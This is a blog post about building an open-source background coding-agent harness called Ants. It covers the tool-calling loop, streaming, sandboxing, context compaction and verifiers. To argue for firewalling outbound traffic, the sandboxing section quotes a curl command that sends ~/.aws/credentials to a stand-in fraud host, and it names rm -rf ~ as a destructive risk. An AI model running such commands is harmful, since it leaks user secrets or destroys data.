Building Background Agents

@dalexeenko | May 19, 2026

In the summer of 2025, I was sitting on a patio next to Jardim da Estrela in Lisbon when a group of friends at dinner asked me what I was excited about in tech. Naturally, I said AI. But it wasn't until November 2025, when I pointed my OpenCode instance at Claude Opus 4.5, that I actually got hooked.

I'd always been curious about the engineering problems one has to solve to build an orchestration harness on top of a large language model. How do you build a tool that relentlessly pushes toward progress, instead of a single transactional response that tells you that you're absolutely right?

The best way to find out is, of course, to build one. So I did (with the help of a good friend, Brian Brunner). The result is Ants. Below is an exploration of building something similar to Stripe Minions, Ramp Inspect, or Shopify River.

The agent streams tool calls and bash output in real time as it scaffolds a TypeScript project.

What the system actually does

Everything starts with a chat window. The system spawns a worker per project, the worker calls an LLM in a loop and uses tools to make real changes on disk, and a stream of events flows back to you in real time. There are four moving parts:

A web app. It runs in your browser and is essentially a chat window.
A server. It listens on a port, owns the database of projects, and is the only part of the system that ever talks to the workers.
An agent — one Node.js process per project, spawned by the server on demand. This is the actual robot. It calls the model, executes tools, writes files, runs commands, and emits events about everything it does.
A model. Can be Claude, GPT, Kimi, etc. The architecture is model-agnostic; you can swap in anything that speaks the Anthropic-style tool-calling protocol.

The flow looks like this:

Browser
  │  POST /prompt/stream
  ▼
Server (port 6647)
  │  spawn / connect
  ▼
Agent (per-project Node process)
  │  HTTPS
  ▼
Model

Every interesting design decision in the system is about what happens within one of these transitions.

The big for loop

First things first, the agent loop. The agent's job is to take a single user message and turn it into a result. Doing that usually takes more than one model call. The loop is quite simple:

1. Ask the model what to do next
2. If the model returned no tool calls → done
3. Otherwise, execute each tool, append the results, and loop

The loop in Ants is a for loop capped at two hundred iterations. The cap matters: a model that gets confused can sit in a loop calling ls forever, and you don't want to find out about it because your bill exceeded the alert threshold.

packages/core/src/prompt/executor.ts

const recentSignatures: string[] = []
 
for (let i = 0; i < MAX_ITERATIONS; i++) {
  const response = await model.complete({ messages, tools })
  messages.push(response)
 
  if (response.toolCalls.length === 0) return // model is done
 
  const sig = JSON.stringify(response.toolCalls.map(c => [c.name, c.input]))
  recentSignatures.push(sig)
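  const lastFive = recentSignatures.slice(-5)
  // Only trip once five signatures exist; otherwise the very first tool call would match itself.
  if (lastFive.length === 5 && lastFive.every(s => s === sig)) {
    throw new Error("agent stuck: 5 identical tool calls in a row")
  }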
 
  for (const call of response.toolCalls) {
    messages.push({ role: "tool", id: call.id, content: await tools.run(call) })
  }
}
throw new Error(`hit ${MAX_ITERATIONS} iteration cap`)

There is a second cap here that catches a more interesting failure mode. Every iteration, the agent computes a call signature, a serialization of the tool names and arguments it just asked for. The last five signatures are compared on every pass. If all five are identical, the agent is stuck and the loop throws; the same call with the same arguments five times in a row is almost never the right answer.

Both of those safeguards exist for the same reason: a loop that won't stop on its own.

The opposite question — how the loop knows when there's nothing left to do — turns out to be challenging. The common convention is implicit: the model produces an assistant message with no tool calls, and the loop exits. There is no explicit "complete" tool. The model itself decides when it's done.

But this convention has a couple of problems:

First, "no tool calls" isn't exactly the same thing as "the model finished". Every response also carries a stop_reason, and it isn't always end_turn: the model may have been cut off by max_tokens, for example. I shipped a version of Ants that didn't look at that part of the response: the Anthropic client received stop_reason and dropped it. A response that hit max_tokens with no tool calls in the final block looked like completion. The fix is to normalize the model's stop signal into the response object, treat end_turn/stop as done, and surface everything else as incomplete or retryable.
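
A minimal sketch of that normalization follows. The TurnOutcome type and the normalizeStop function are hypothetical names, not taken from Ants, and folding every unrecognized signal into "incomplete" is an assumption; a real harness might split out a separate retryable case.

```typescript
// Hypothetical outcome type; the names are illustrative, not taken from Ants.
type TurnOutcome = "done" | "continue" | "incomplete"

// Collapse a provider's raw stop signal into one of three outcomes.
function normalizeStop(
  rawStopReason: string | null | undefined,
  toolCallCount: number,
): TurnOutcome {
  // Pending tool calls always mean the loop has more work to do.
  if (toolCallCount > 0) return "continue"

  switch (rawStopReason) {
    case "end_turn": // Anthropic: the model chose to stop
    case "stop":     // OpenAI-style finish_reason
      return "done"
    default:
      // max_tokens, length, a missing value, or anything unrecognized
      // is never treated as completion.
      return "incomplete"
  }
}
```

With this in place, the loop's exit condition becomes "outcome is done" rather than "the tool call list is empty", so a truncated response can no longer pass for a finished one.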

Second, recovery from tool failure. When npm install fails because the npm registry was flaky, should you feed stderr back and let the model try again, or escalate? Most agents just feed it back. Usually fine, but it can turn a flaky network call into a long retry loop. You need to classify tool errors: transient (retry with backoff), user-correctable (surface to the user), and fatal (abort the session) — and put policy around each.
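
One way to sketch that classification is below. The regular expressions are illustrative placeholders rather than a vetted list, the names are hypothetical, and the extra "unclassified" bucket (which would fall back to feeding stderr to the model) is an assumption layered on top of the three classes named above.

```typescript
type ErrorClass = "transient" | "user-correctable" | "fatal" | "unclassified"

interface ToolResult {
  ok: boolean
  stderr: string
}

// Illustrative patterns only; a real harness would tune these per tool.
const TRANSIENT_PATTERNS = [/ETIMEDOUT/, /ECONNRESET/, /EAI_AGAIN/]
const USER_PATTERNS = [/EACCES/, /permission denied/i]
const FATAL_PATTERNS = [/ENOSPC/, /out of memory/i]

function classifyToolError(stderr: string): ErrorClass {
  if (TRANSIENT_PATTERNS.some(re => re.test(stderr))) return "transient"
  if (USER_PATTERNS.some(re => re.test(stderr))) return "user-correctable"
  if (FATAL_PATTERNS.some(re => re.test(stderr))) return "fatal"
  return "unclassified"
}

const sleep = (ms: number) => new Promise<void>(resolve => setTimeout(resolve, ms))

// Retry only transient failures, with exponential backoff, up to maxAttempts
// total runs. Any other outcome is returned to the caller to apply policy.
async function runWithBackoff(
  run: () => Promise<ToolResult>,
  maxAttempts = 3,
  baseDelayMs = 200,
): Promise<ToolResult> {
  let result = await run()
  for (let attempt = 1; attempt < maxAttempts; attempt++) {
    if (result.ok || classifyToolError(result.stderr) !== "transient") break
    await sleep(baseDelayMs * 2 ** (attempt - 1))
    result = await run()
  }
  return result
}
```

The point of the bounded retry is that a flaky registry costs a few seconds of backoff inside the harness instead of several extra model calls.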

Finally, it's a good idea to have a few layers of verification on top: did the tests actually pass, did the function actually compile, did the schema actually validate. If not, reject the model's notion of done until the world agrees.

Streaming

An under-appreciated part of building an agent harness is the streaming pipeline. The user doesn't want to wait fifteen seconds for the agent to "think". They want to see text appear word-by-word, and they want to see "calling bash..." flash up the moment the tool fires.

That means events have to flow three hops in real time:

Model  ──SSE──▶  Agent (message_start, content_block_delta, tool_use)
Agent  ──SSE──▶  Server (richer protocol: tool results, todo updates, errors)
Server ──SSE──▶  Browser (proxy + event-buffer for replay)

Event-buffering is what makes the chat survive a closed tab. Each session has an append-only event log keyed by _eventIndex. If the browser disconnects, it can reconnect with ?lastEventIndex=N and replay anything it missed. Two tabs subscribed to the same session both get the same fire-hose.

apps/server/src/services/session-event-buffer.ts

class SessionEventBuffer {
  private events: Event[] = []
  private subscribers = new Set<(e: Event) => void>()
 
  append(event: Omit<Event, "_eventIndex">) {
    const e = { ...event, _eventIndex: this.events.length }
    this.events.push(e)
    for (const fn of this.subscribers) fn(e)
  }
 
  subscribe(fromIndex: number, onEvent: (e: Event) => void) {
    for (const e of this.events.slice(fromIndex)) onEvent(e) // replay
    this.subscribers.add(onEvent)
    return () => this.subscribers.delete(onEvent)
  }
}

A non-obvious bug I hit here was that the same async generator was being consumed by two readers. My Anthropic client returned the streaming generator to the executor and, in the same function, started a createResponsePromise(...) that also iterated the generator to assemble the final message object. An async generator hands each value to exactly one consumer, so roughly half of every model response went to the response promise and the other half went to the executor. The outcome was that the agent would occasionally drop a sentence mid-stream, and compaction summaries came out missing pieces. The fix is to make the response promise wait on a shared state.done flag that the executor's consumption populates, instead of consuming the generator itself.
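
The single-reader shape can be sketched like this. It is not the Ants code: streamOnce and fakeModelStream are hypothetical names, and a promise stands in for the state.done flag. The wrapper is the only thing that iterates the source; it forwards each chunk and resolves the promise once the stream is drained.

```typescript
// Wrap a one-shot stream so it has exactly one reader. The wrapper forwards
// each chunk and, once drained, resolves `done` with the assembled text.
function streamOnce(source: AsyncIterable<string>) {
  let resolveDone!: (full: string) => void
  let rejectDone!: (reason: unknown) => void
  const done = new Promise<string>((resolve, reject) => {
    resolveDone = resolve
    rejectDone = reject
  })
  // Avoid an unhandled-rejection warning when nobody awaits `done`;
  // callers that do await it still see the rejection.
  done.catch(() => undefined)

  async function* forward(): AsyncGenerator<string> {
    let full = ""
    try {
      for await (const chunk of source) {
        full += chunk
        yield chunk
      }
      resolveDone(full)
    } catch (err) {
      rejectDone(err)
      throw err
    }
  }

  return { chunks: forward(), done }
}

// Stand-in for a model stream.
async function* fakeModelStream(): AsyncGenerator<string> {
  for (const piece of ["Hel", "lo ", "wor", "ld"]) yield piece
}
```

The executor iterates chunks and anything that needs the final message awaits done. One caveat of this sketch: done only settles if the consumer drains the stream, so an early break leaves it pending.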

Sandboxes everywhere

Once the agent is running, it can execute arbitrary code on your machine. This is where it gets interesting. Typically you have the following options:

Approach                      Isolation             Slowdown        Pain
Run as the user on host       none                  none            `rm -rf ~`
Git worktree                  filesystem only       minimal         still `rm -rf`
Docker container              filesystem + network  seconds         Docker daemon
Firecracker / gVisor          kernel-level          seconds         infra effort
Remote sandbox (Modal, E2B)   full                  ~100ms network  cost, vendor

The filesystem boundary was the bit I most underestimated. My read/write/edit tools each checked fullPath.startsWith(ctx.workingDirectory). Fine, except /tmp/repo-secrets/file also starts with /tmp/repo. A model walking one directory up lands in someone else's data. One line, subtly wrong, in three files. The right check is to resolve both paths and refuse anything whose relative path begins with .. or is absolute — and run a symlink-realpath pass on top, because a friendly-looking symlink inside the workspace will gladly point at /etc.
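
The check described above can be sketched as follows, assuming Node's path and fs modules. The function names are hypothetical, not the ones in Ants, and the sketch does not address races between the check and the later read or write.

```typescript
import * as fs from "node:fs"
import * as path from "node:path"

// True when `candidate` is `root` itself or sits somewhere beneath it.
function isInside(root: string, candidate: string): boolean {
  const rel = path.relative(root, candidate)
  const escapes = rel === ".." || rel.startsWith(".." + path.sep) || path.isAbsolute(rel)
  return !escapes
}

// lstat-based existence check, so a dangling symlink still counts as existing.
function entryExists(p: string): boolean {
  try {
    fs.lstatSync(p)
    return true
  } catch {
    return false
  }
}

// Resolve `requested` against the workspace and refuse anything that leaves it,
// either lexically (../) or through a symlink.
function resolveInWorkspace(workingDirectory: string, requested: string): string {
  const root = fs.realpathSync(workingDirectory)
  const lexical = path.resolve(root, requested)
  if (!isInside(root, lexical)) {
    throw new Error(`path escapes workspace: ${requested}`)
  }

  // Files that do not exist yet cannot be realpath'd, so check the deepest
  // ancestor that does exist.
  let existing = lexical
  while (!entryExists(existing)) existing = path.dirname(existing)
  const real = fs.realpathSync(existing) // throws on a dangling symlink
  if (!isInside(root, real)) {
    throw new Error(`symlink escapes workspace: ${requested}`)
  }
  return lexical
}
```

Comparing relative paths instead of string prefixes is what separates /tmp/repo from /tmp/repo-secrets: the relative path from the first to the second starts with "..", so it is rejected.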

Even in a Docker container, curl https://fraud.com/$(cat ~/.aws/credentials) works unless you firewall outbound. The Docker network is bridged by default; the world is reachable. The choices are roughly --network none with an explicit egress proxy for the handful of hosts you actually need (npm, GitHub, the model provider), or an egress allow-list at the firewall.

The agent also needs to push branches, but you don't want it reading ~/.ssh. Issue a short-lived GitHub App token scoped to a single repository, mount it into the container, let it expire in under an hour. Same with model API keys: don't pass ANTHROPIC_API_KEY through to the container if you can route the calls through a server-side proxy that injects the key. Ambient credentials are a class of mistake; eliminate the class, don't whack-a-mole the instances.

Then there's the permission system itself. The first time the agent wants to run git push, ask the user; if they answer "always", subsequent calls in the same session are allowed without prompting. Ants does this in packages/core/src/permissions.ts: there's an alwaysAllow list, an ask mode, and a deny list, and the executor enforces them around every tool call.

packages/core/src/permissions.ts

type Decision = "allow" | "ask" | "deny"
 
async function check(call: ToolCall, session: Session): Promise<Decision> {
  if (session.deny.matches(call)) return "deny"
  if (session.alwaysAllow.matches(call)) return "allow"
 
  const decision = await session.askUser(call) // suspends the loop
  if (decision === "always") session.alwaysAllow.add(call.signature)
  return decision === "always" ? "allow" : decision
}

Sandbox code should be default-deny. My Docker manager mounted the project read-write, passed through environment secrets, and only enabled a network policy if one was explicitly configured. That is exactly backwards. The right defaults are read-only mounts (with one explicit write layer), no inherited env, network off until configured. You only get to be permissive by name.
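
A sketch of what default-deny can look like when building the docker run arguments. SandboxOptions and dockerRunArgs are hypothetical names, the /workspace mount point is an assumption, and using --tmpfs for the write layer is just one way to provide it.

```typescript
interface SandboxOptions {
  image: string
  projectDir: string                // host path, mounted read-only
  writablePaths?: string[]          // container paths that get a tmpfs write layer
  env?: Record<string, string>      // nothing is passed unless named here
  network?: string                  // docker network name; omitted means no network
}

// Build `docker run` arguments that are locked down unless the caller
// explicitly opts in to something.
function dockerRunArgs(opts: SandboxOptions): string[] {
  const args = ["run", "--rm", "--read-only"]

  // Network is off until a network is configured by name.
  args.push("--network", opts.network ?? "none")

  // The project is visible but not writable.
  args.push("--volume", `${opts.projectDir}:/workspace:ro`)

  // Explicit write layers only.
  for (const containerPath of opts.writablePaths ?? []) {
    args.push("--tmpfs", containerPath)
  }

  // No inherited environment: only variables listed by the caller.
  for (const [key, value] of Object.entries(opts.env ?? {})) {
    args.push("--env", `${key}=${value}`)
  }

  args.push(opts.image)
  return args
}
```

Calling dockerRunArgs with only an image and a project directory yields a container with a read-only root filesystem, a read-only project mount, no network, and no extra environment variables. Every permission beyond that has to appear by name in the options.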

Context window management and compaction

Every LLM conversation eventually outgrows the model's context window (up to 1M tokens on some models these days; crazy to think it was closer to 10k just three years ago). A long session, especially one with tool calls and results in it, can hit the limit in under an hour. You have to summarize the conversation to keep it moving; this is compaction.

You can do this in three layers: proactively at the start of each user turn if the window's grown past a threshold, defensively right before the API call if the payload is over ~95% of the model limit, and reactively after a context_length_exceeded error from the API.
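
The three layers can be sketched roughly as below. The CompactionHooks interface and both function names are hypothetical, and the 0.7 proactive ratio is a placeholder, since the only number given above is the ~95% defensive check.

```typescript
// Assumed thresholds: ~95% comes from the text; 0.7 is a placeholder.
const PROACTIVE_RATIO = 0.7
const DEFENSIVE_RATIO = 0.95

interface CompactionHooks<T> {
  modelLimit: number
  estimateTokens(): number
  compact(): Promise<void>
  callModel(): Promise<T>
  isContextLengthError(err: unknown): boolean
}

// Layer 1 (proactive): run at the start of each user turn.
async function compactAtTurnStart<T>(h: CompactionHooks<T>): Promise<boolean> {
  if (h.estimateTokens() <= PROACTIVE_RATIO * h.modelLimit) return false
  await h.compact()
  return true
}

// Layers 2 and 3 (defensive, reactive): wrap every model call.
async function callWithCompaction<T>(h: CompactionHooks<T>): Promise<T> {
  // Defensive: the payload is about to exceed the limit.
  if (h.estimateTokens() > DEFENSIVE_RATIO * h.modelLimit) await h.compact()
  try {
    return await h.callModel()
  } catch (err) {
    // Reactive: the provider rejected the request as too long.
    if (!h.isContextLengthError(err)) throw err
    await h.compact()
    return await h.callModel() // one retry; a second failure propagates
  }
}
```

The reactive layer exists because token estimates are approximate: the harness can believe it is under the limit while the provider's tokenizer disagrees.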

The summary itself is an LLM call. A fixed prompt asks the model for a structured summary: tasks completed, files modified, key decisions, problems encountered, current state, next steps. That summary becomes message zero in the next prompt sent to the model, and the agent's working window is, by definition, "everything from the most recent summary to the present."

A subtle but useful reframe here: the working window isn't the conversation. The conversation lives in the same SessionEventBuffer from earlier — the append-only event log, durable, complete — and the working window is a view the harness computes from it each turn. Summarization is one view; the raw tail is another; a retrieval cut ("the eight events most relevant to the next user message") is a third. Once you see it that way, nothing about old events is irreversible. You don't throw them away when you compact; you stop including them in the next view. If the summary turns out to be lossy, the events themselves are still there.
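
To make the "view" framing concrete, here is a small sketch with two views computed over the same read-only log. LoggedEvent and both function names are hypothetical, and a retrieval view is left out because it would need an embedding step.

```typescript
interface LoggedEvent {
  index: number
  kind: "message" | "summary"
  text: string
}

// View 1: everything from the most recent summary to the present.
function sinceLastSummary(log: readonly LoggedEvent[]): LoggedEvent[] {
  for (let i = log.length - 1; i >= 0; i--) {
    if (log[i]?.kind === "summary") return log.slice(i)
  }
  return log.slice() // no summary yet: the whole log is the window
}

// View 2: the raw tail, ignoring summaries entirely.
function rawTail(log: readonly LoggedEvent[], count: number): LoggedEvent[] {
  return count <= 0 ? [] : log.slice(-count)
}
```

Neither function mutates the log, so switching strategy between turns, or falling back to the raw tail when a summary looks lossy, is just a matter of calling a different function.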

The interesting failure modes here are not the obvious ones. Compaction quality matters more than compaction frequency. A bad summary leads to the agent re-deciding an already settled question incorrectly, or worse, undoing its earlier work. You end up with a game of broken telephone. Compaction is one of the few places where the system can actively make itself worse, and the only honest fix is to keep the underlying log around so you can recover.

Compaction is also the cheapest of three patterns for "the model can't hold everything in its head"; retrieval (embed past messages, pull what's relevant) and structured memory (Claude Code's memory tool, remember(fact) / recall(query)) are the other two. A serious system uses all three as different view strategies over the same event log. Ants only really uses compaction today, which is the honest answer to why it forgets what you told it last week.

Tool definitions are prompts (and they have to be valid JSON Schema)

I want to use one bug I hit this week to illustrate a more general lesson.

After everything else was wired up, my agent kept hanging on its first model call. I'd added an ANTHROPIC_API_KEY, the server logs showed the request going out, and then nothing. The agent process was alive but waiting forever. The chat sat on a "Thinking…" indicator with no diagnostic of any kind: the user message had been posted, the agent had spawned, but the underlying model call was being silently rejected.

The actual error, once I looked at the right log line, was:

tools.18.custom.input_schema: JSON schema is invalid.
It must match JSON Schema draft 2020-12

The nineteenth tool in the array had a schema Claude refused to accept. The cause was that I was generating my tool schemas with zod-to-json-schema set to target: "openApi3". OpenAPI 3.0 is a dialect of JSON Schema that uses nullable: true instead of type: ["string", "null"], doesn't use $defs, and has a handful of other small differences. Claude requires JSON Schema 2020-12 specifically. The fix was tiny (drop the target option), but the lesson is broader.

Tool definitions are prompts, and like prompts, they have a contract with the model. The description text is what the model reads when it decides which tool to call. A tool description that says "use this when you want to edit a file" is a description; a tool description that says "use this for edits where you know the exact previous string; if you only have a fuzzy location, prefer search_replace" is a specification. The model behaves dramatically differently between the two.

The OpenAPI/JSON-Schema dialect issue is the same kind of problem: a contract failure that silently dropped my agent into a stuck state, because the error surfaced from the model only after a few seconds of latency. Validate your tool schemas eagerly: run them through Ajv against the dialect your model requires, as a unit test, on every commit. The class of bug where the model rejects your schema after a network round-trip is uniquely painful because nothing in your local environment surfaces it.
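
Full validation against the 2020-12 meta-schema is a job for a validator such as Ajv. As a cheap, dependency-free complement, the sketch below walks a schema and flags two OpenAPI 3.0 idioms: the nullable keyword mentioned above, and the boolean form of exclusiveMinimum / exclusiveMaximum, which newer JSON Schema drafts define as numbers. The function name is hypothetical and the list of checks is deliberately incomplete.

```typescript
type Json = null | boolean | number | string | Json[] | { [key: string]: Json }

// Keywords whose values map arbitrary names to subschemas.
const SCHEMA_MAPS = new Set(["properties", "patternProperties", "$defs", "definitions"])
// Keywords whose values are plain data, not schemas.
const DATA_KEYWORDS = new Set(["enum", "const", "default", "examples", "example"])

function findOpenApiIsms(schema: Json, pointer = "#"): string[] {
  if (schema === null || typeof schema !== "object") return []
  const problems: string[] = []

  if (Array.isArray(schema)) {
    schema.forEach((item, i) => problems.push(...findOpenApiIsms(item, `${pointer}/${i}`)))
    return problems
  }

  if ("nullable" in schema) {
    problems.push(`${pointer}: "nullable" is OpenAPI 3.0; use a type array instead`)
  }
  for (const keyword of ["exclusiveMinimum", "exclusiveMaximum"]) {
    if (typeof schema[keyword] === "boolean") {
      problems.push(`${pointer}: boolean "${keyword}" is OpenAPI 3.0; 2020-12 expects a number`)
    }
  }

  for (const [key, value] of Object.entries(schema)) {
    if (DATA_KEYWORDS.has(key)) continue
    const child = `${pointer}/${key}`
    if (SCHEMA_MAPS.has(key) && value !== null && typeof value === "object" && !Array.isArray(value)) {
      // Names inside a schema map are user-chosen, so a property that happens
      // to be called "nullable" is not a keyword. Check only its subschema.
      for (const [childName, sub] of Object.entries(value)) {
        problems.push(...findOpenApiIsms(sub, `${child}/${childName}`))
      }
    } else {
      problems.push(...findOpenApiIsms(value, child))
    }
  }
  return problems
}
```

Run over every tool's input schema in a unit test, an empty result means none of these particular idioms slipped in. It says nothing about overall validity, which is still the validator's job.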

Verifiers, or: how the agent measures itself

There is an entire failure mode where the agent thinks it's done, the chat looks great, and the code doesn't actually work. The defense against this is verifiers — small pure functions that score the world after the agent has finished. Ants has them in packages/verifiers:

fileExists(path) — did the file get created?
fileContains(path, pattern) — does it contain the right thing?
scriptOutputs(path, expected) — does running it produce the right stdout?
typescriptCompiles(path) — does tsc --noEmit pass?

Each returns a score between zero and one, and verifiers compose: allPass averages, anyPass takes the max. A task with two verifiers can score 0.5 if the agent produced the right output via a different code path than expected. That partial credit is the whole point — it's what gives you a gradient instead of a binary pass/fail, and it's what makes the harness usable for RL training, not just for evaluation.

packages/verifiers/src/index.ts

import * as fs from "node:fs"
import * as path from "node:path"

type Verifier = (cwd: string) => Promise<number> // 0..1
 
const fileExists = (p: string): Verifier =>
  async cwd => (fs.existsSync(path.join(cwd, p)) ? 1 : 0)
 
const allPass = (...vs: Verifier[]): Verifier =>
  async cwd => {
    const scores = await Promise.all(vs.map(v => v(cwd)))
    return scores.reduce((a, b) => a + b, 0) / scores.length
  }
 
const anyPass = (...vs: Verifier[]): Verifier =>
  async cwd => Math.max(...(await Promise.all(vs.map(v => v(cwd)))))
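
To see the partial-credit behaviour in isolation, here is a self-contained sketch. It repeats the Verifier type, fileExists, and allPass so it runs on its own; the body of fileContains is an assumed implementation and greetingTask is a hypothetical task, neither taken from the Ants package.

```typescript
import * as fs from "node:fs"
import * as path from "node:path"

type Verifier = (cwd: string) => Promise<number> // score in 0..1

const fileExists = (p: string): Verifier =>
  async cwd => (fs.existsSync(path.join(cwd, p)) ? 1 : 0)

// Assumed implementation; the real fileContains may differ.
const fileContains = (p: string, pattern: RegExp): Verifier =>
  async cwd => {
    const full = path.join(cwd, p)
    if (!fs.existsSync(full)) return 0
    return pattern.test(fs.readFileSync(full, "utf8")) ? 1 : 0
  }

const allPass = (...vs: Verifier[]): Verifier =>
  async cwd => {
    const scores = await Promise.all(vs.map(v => v(cwd)))
    return scores.reduce((a, b) => a + b, 0) / scores.length
  }

// Hypothetical task: write greeting.txt containing "hello, world".
const greetingTask = allPass(
  fileExists("greeting.txt"),
  fileContains("greeting.txt", /hello, world/),
)
```

An agent that creates greeting.txt with the wrong contents scores 0.5 on greetingTask, one that writes the expected text scores 1, and one that creates nothing scores 0.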

This is also the part of the system that gets you to "we can A/B test prompt changes" and "we can fine-tune a model against our own benchmark." Without it, every change to the agent is a vibes-based change.

Multi-agent orchestration

Once one agent works, the natural next move is to run several at once. But that opens its own can of worms: when you have N agents, how do they coordinate?

Shared state is the boring half. Two agents editing the same file race each other; last write wins, the other agent's work disappears. The straightforward fix is per-agent worktrees that merge at the end. The simpler-but-uglier one is a checkout lock that serializes writes. Ants does the former; Cursor's background agents do something similar with per-task containers.
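
For reference, the simpler-but-uglier option fits in a few lines. This is a generic promise-chain lock with a hypothetical name, not something Ants ships, and it only serializes writers inside one process.

```typescript
// Serialize access to a shared checkout: each task starts only after the
// previous one has settled, whether it succeeded or failed.
class CheckoutLock {
  private tail: Promise<void> = Promise.resolve()

  run<T>(task: () => Promise<T>): Promise<T> {
    const result = this.tail.then(task)
    // Keep the chain alive even if this task rejects.
    this.tail = result.then(() => undefined, () => undefined)
    return result
  }
}
```

Every agent wraps its write phase in lock.run(...). The cost is that agents queue behind each other, which is exactly the parallelism worktrees preserve.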

The interesting half is the orchestrator-worker pattern: one LLM call splits the task, dispatches sub-tasks to worker agents, then aggregates the results. Each worker has its own context, much smaller than a single monolithic agent would need. The hard part is the aggregation prompt — "here are four PR-like outputs from four sub-agents, merge them sensibly" is not something a model does well by default. The harness has to give the orchestrator the right primitives (the diff, the test results, the verifier scores) and ask a precise question.

Budget enforcement is where I got it wrong. My task tool exposes maxIterations and tokenBudget as parameters a parent agent can set on a child. They look like first-class controls. They aren't. executeSubagent accepted them, prefixed them with an underscore — the universal TypeScript signal for "I'm ignoring this on purpose" — and let the child fall through to the global 200-iteration cap. From the parent's perspective the budget was honored. From the runtime's perspective there was no budget at all. Any control surface a parent agent can set on a child needs to be checked inside the child's loop, after every LLM call and every tool result. Multi-agent systems amplify whatever you got wrong in the single-agent case.
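
A sketch of what "checked inside the child's loop" means in practice. ChildBudget, StepResult, and runChild are hypothetical names; here one step stands for one LLM call plus the tool results that follow it, and a finished step is allowed to return even if it crossed the token budget.

```typescript
interface ChildBudget {
  maxIterations: number
  tokenBudget: number
}

interface StepResult {
  tokensUsed: number
  finished: boolean
}

// Run a child agent step by step, enforcing the parent's budget inside the
// loop rather than trusting a global cap.
async function runChild(
  step: () => Promise<StepResult>,
  budget: ChildBudget,
): Promise<{ iterations: number; tokensUsed: number }> {
  let tokensUsed = 0
  for (let i = 0; i < budget.maxIterations; i++) {
    const result = await step()
    tokensUsed += result.tokensUsed
    if (result.finished) return { iterations: i + 1, tokensUsed }
    if (tokensUsed > budget.tokenBudget) {
      throw new Error(`child exceeded its token budget (${tokensUsed} > ${budget.tokenBudget})`)
    }
  }
  throw new Error(`child hit its iteration budget (${budget.maxIterations})`)
}
```

The important property is that both limits come from the arguments the parent passed, so an ignored parameter becomes impossible to miss: the loop cannot be written without reading them.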

From what I've seen at work, parallelism wins. Two or three workers with small contexts cost less in tokens than one big agent with a giant context, and they finish faster. The catch is that you only get that if your aggregation works and your budget controls are real.

Brian and I worked together for years at Stripe and Cloudflare. He just joined OpenAI. I don't know what an engineering org looks like when most of the code gets shipped by agents instead of engineers. Brian will. Maybe he'll tell me.

Ants is open source at github.com/dalexeenko/ants.